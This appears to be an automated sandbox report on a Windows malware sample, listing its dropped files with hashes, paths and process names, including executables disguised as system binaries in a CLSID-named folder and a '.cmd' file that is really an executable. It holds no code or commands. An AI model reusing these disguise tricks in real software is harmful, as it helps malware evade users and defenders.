SHA256 84963f728e6f632c9d8981d52f324ea8884c1f74f6b9926a61154ee542fa9ea7
CRC32 B12D94B6
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name aa1ae9873ce2e396_msvbvm60.dll
Filepath C:\Windows\system\msvbvm60.dll
Size 1.3MB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe)
Type PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 b8449b22ac12063d2fda7f59a53134fa
SHA1 b6be749ee311f9d9403ddb16e1ca454d7b541c0c
SHA256 aa1ae9873ce2e396c4d770e09e670be98de9c5a66300300f4289ec883579c5ab
CRC32 FEBE284B
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name cac091d79a997c38_service.exe
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\service.exe
Size 1.6MB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 31250e91ff9623333e050fbc3d34f02a
SHA1 e6acfc59578ffdc8509bdac76fe32047ce52bc1f
SHA256 cac091d79a997c38f14a8d98a88b3a853c53a08eeae41ac2fa361a1c498b2d89
CRC32 C71BA0F3
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 023ad0bafbcba795_cypreg.dll
Filepath C:\Windows\cypreg.dll
Size 417.0KB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe) 1836 (winlogon.exe) 2492 (system.exe)
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e858dc6e832d53af9da967d087527789
SHA1 cbdc2c26f133f157491cf3bab6108a64e7e4c8ca
SHA256 023ad0bafbcba79566548d18036ffd5d6be8c012ce42436c8cb5fcbe3e5e2a74
CRC32 F605A163
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 9000aaac46aee9ca_smss.exe
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\smss.exe
Size 1.6MB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe) 1836 (winlogon.exe) 2492 (system.exe) 2404 (smss.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 8b27fdfa1c7148cd2750ab778fed2297
SHA1 e09ed759bef93c78e3f92b297c7b92d1a4edf881
SHA256 9000aaac46aee9ca40e2a2cf8ee4f71c4851e828ea39d47026a5ea4c7ef9ec30
CRC32 72F9544A
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 724d391b889992b2_moonlight.r.txt
Filepath C:\Windows\MooNlight.R.txt
Size 278.0B
Processes 2404 (smss.exe)
Type ASCII text, with CRLF line terminators
MD5 83a827aed536e51a7723c23ca321ac77
SHA1 bc539b55ff8f9b969fe4707bc36d43c15631b0d6
SHA256 724d391b889992b2b651ecb5b66310c27f4f720db0bf45c9c298e51ff37aa37e
CRC32 FF0E18F9
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 878d0ba50cc4784b_tms5f3l.exe
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\TMS5F3L.exe
Size 1.6MB
Processes 1176 (lsass.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 1f600ecea195eae7d4c170885e21d881
SHA1 fd3ac5ab031d314c54ee9f1c57baf86e346ba610
SHA256 878d0ba50cc4784bcd374855d2cf1c202b3cb1ee8d58e3ea7f06a6bb3e7a8c52
CRC32 98BA03EF
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 5d39b3d31fe1e954_my music.exe
Filepath C:\Users\Administrator\Music\My Music.exe
Size 1.6MB
Processes 2404 (smss.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 db890cfc6d8afc9e9b6042fda13f8ce3
SHA1 784a05333fee03261658462442d716431f27b555
SHA256 5d39b3d31fe1e954c4a7db4d200afb9e9add5237de94ed301764e45f255c0e09
CRC32 8758D46C
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name e00ec3ddddd2efeb_regedit.cmd
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\regedit.cmd
Size 1.6MB
Processes 2404 (smss.exe) 1176 (lsass.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 6cea08e888ec124a565550c819ea0a91
SHA1 3bb94a68f704275ce9e59dfa7706f45b3e9a87b2
SHA256 e00ec3ddddd2efeb396c86c2e8e392d8f99947a667d1e37b57cb740b161409f5
CRC32 B76AD261
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 07928f5a5fd5b3c5_cypreg.dll
Filepath C:\Windows\cypreg.dll
Size 417.0KB
Processes 2492 (system.exe)
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c2c497aaa61ee4a3f14827917511263c
SHA1 9f3979115a87fb02d779184885858ab5d2d4ee9b
SHA256 07928f5a5fd5b3c5f095358af8be5899fdc973832ee5c9650e4b4b168c5dae3e
CRC32 5C020B3E
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name cc5a1b83ed2744a8_TMS5F3L.exe
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\TMS5F3L.exe
Size 1.6MB
Processes 2492 (system.exe) 1176 (lsass.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 2c2209127b03b7d8015a7e6155c501aa
SHA1 2314135053772b73527acbe1ed1c6851a1724d45
SHA256 cc5a1b83ed2744a897d52e948f3f63de248efcdd06ae3d0b2a126c380a439bd3
CRC32 42CB5247
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name f5d3d06d7bd65dd4_nrn8r6k.com
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\NRN8R6K.com
Size 1.6MB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe) 1836 (winlogon.exe) 2492 (system.exe) 2404 (smss.exe) 1176 (lsass.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 3fdb8f93354648e5d4d4af281a7a2eae
SHA1 c203fd4678de490af1ce39e4be3de59c951d4672
SHA256 f5d3d06d7bd65dd434905bc4c36bfdec566d1181b7a9227dc14b8d052a69c921
CRC32 08299459
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 34929634686827e2_~DF06D727A0A9D4599C.TMP
Filepath C:\Users\Administrator\AppData\Local\Temp\~DF06D727A0A9D4599C.TMP
Size 9.0KB
Type Composite Document File V2 Document, Cannot read section info
MD5 1269f2da8dbaa50ce3f25ccf89418ac5
SHA1 5206411758600e603151a628d2aafd8b730a7251
SHA256 34929634686827e2581929430711d6c7e6b3ba54ce4ee0694cf1e4868802ebf7
CRC32 B352C76C
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 640f4dac377b5e0a_vqp2w7r.cmd
Filepath C:\Windows\SysWOW64\OGH7K8U\VQP2W7R.cmd
Size 1.6MB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe) 1836 (winlogon.exe) 2492 (system.exe) 2404 (smss.exe) 1176 (lsass.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 19aff1afdabcd4737ab4165ad7403cef
SHA1 ea5b9c5c58d0e1ccaa44e78e489b65440d0b4638
SHA256 640f4dac377b5e0af28b46a2875dae127040f71bbd37a8d07c4f1bdc8b837a17
CRC32 7858E6CB
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 5a4ce5403b4725c5_cypreg.dll
Filepath C:\Windows\cypreg.dll
Size 417.0KB
Processes 1176 (lsass.exe)
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c4b8a8c69c01cb54185f2b9b00389020
SHA1 0bf59a8c0c08b2d0aea013670e796dfb3d44deff
SHA256 5a4ce5403b4725c5e9ed26e43d861967c26f0de0b57eebf1812cc729c2dc48f7
CRC32 22553C57
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name c9232a3d020ff450_vqp2w7rwen2i2h.exe
Filepath C:\Windows\SysWOW64\VQP2W7RWEN2I2H.exe
Size 1.6MB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe) 1836 (winlogon.exe) 2492 (system.exe) 2404 (smss.exe) 1176 (lsass.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 1a9ea9ae69647dfb9b5f38851f23709a
SHA1 b56e34044ad8d186bbfde2aaef2ea1c1e2144bc0
SHA256 c9232a3d020ff4500a4e0f241ff833141006e8068247bab08a5628344ed7991a
CRC32 57883745
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 3986380c875ab812_system.exe
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
Size 1.6MB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe) 2404 (smss.exe) 1836 (winlogon.exe) 2492 (system.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 4b49addcf04f43e80409f0513157c6b5
SHA1 0503550fcb098f0688bc1c2f2739783da4a31297
SHA256 3986380c875ab812cc4cde6cc859f1360eb822ae7ff4506c60e88b898672eab7
CRC32 D8F97770
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name fd70d888b164e954_msvbvm60.dll
Filepath C:\Windows\system\msvbvm60.dll
Size 1.3MB
Processes 1176 (lsass.exe)
Type PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 23d20fc9831ebc461826788cea9af7a8
SHA1 55c817767bbe46e80003806501368d5b9310bfdf
SHA256 fd70d888b164e9545c7faf0955b9d03ae246e2597953978936a41ec0cf6f0260
CRC32 88CD568F
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name c8aa5c023bf32f1c_onceinabluemoon.mid
Filepath C:\Windows\onceinabluemoon.mid
Size 8.4KB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe) 2404 (smss.exe) 2492 (system.exe) 1836 (winlogon.exe) 1176 (lsass.exe)
Type Standard MIDI data (format 1) using 2 tracks at 1/240
MD5 0e528d000aad58b255c1cf8fd0bb1089
SHA1 2445d2cc0921aea9ae53b8920d048d6537940ec6
SHA256 c8aa5c023bf32f1c1e27b8136cf4d622101e58a80417d97271d3c0ba44528cae
CRC32 650A2F2E
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 0ac2fe5b0b37a333_TMS5F3L.exe
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\TMS5F3L.exe
Size 1.6MB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2404 (smss.exe) 2492 (system.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 abc5284a8d83873929366f44dd8d5b92
SHA1 a09eeca7ec4937a419ab4ac3ecf829782436630a
SHA256 0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8
CRC32 F729A6FE
ssdeep None
Yara None matched
VirusTotal Search for analysis
Sorry! No dropped buffers.